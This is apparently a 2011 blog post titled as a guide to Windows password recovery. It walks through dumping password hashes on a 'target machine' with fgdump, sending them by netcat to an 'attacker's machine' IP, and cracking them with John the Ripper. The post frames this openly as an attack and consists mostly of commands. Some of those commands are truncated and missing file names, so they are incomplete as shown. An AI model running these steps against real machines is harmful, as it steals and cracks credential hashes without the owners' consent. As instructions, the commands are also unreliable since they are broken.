Friday, March 11, 2011

Basics of Windows password recovery

In this post I outline basics steps for successful Windows password recovery.
Tools used: fgdump, john the ripper

On target machine as Administrator:

C:\> fgdump.exe -c        # dumps passwords from local windows box to file

we use netcat to send dumped hashes to attacker's machine, attacker's machine:

$ nc -l -p 2222 > sam.txt

target machine:

C:\> nc <attackers_ip> 2222 <

On attacker's machine:

$ ./john --session=recovery1

We can stop guessing session with ^C and restore it with:

$ ./john --session=recovery1

Spacebar shows us speed of recovery. Recoverd passwords are in john.pot file, to save them in a file:

$ john --show >

It's basic use scenario of recovering passwords. There's more about john (modes of operation, distributing computation among several machines, optimizing key space). More on it in future.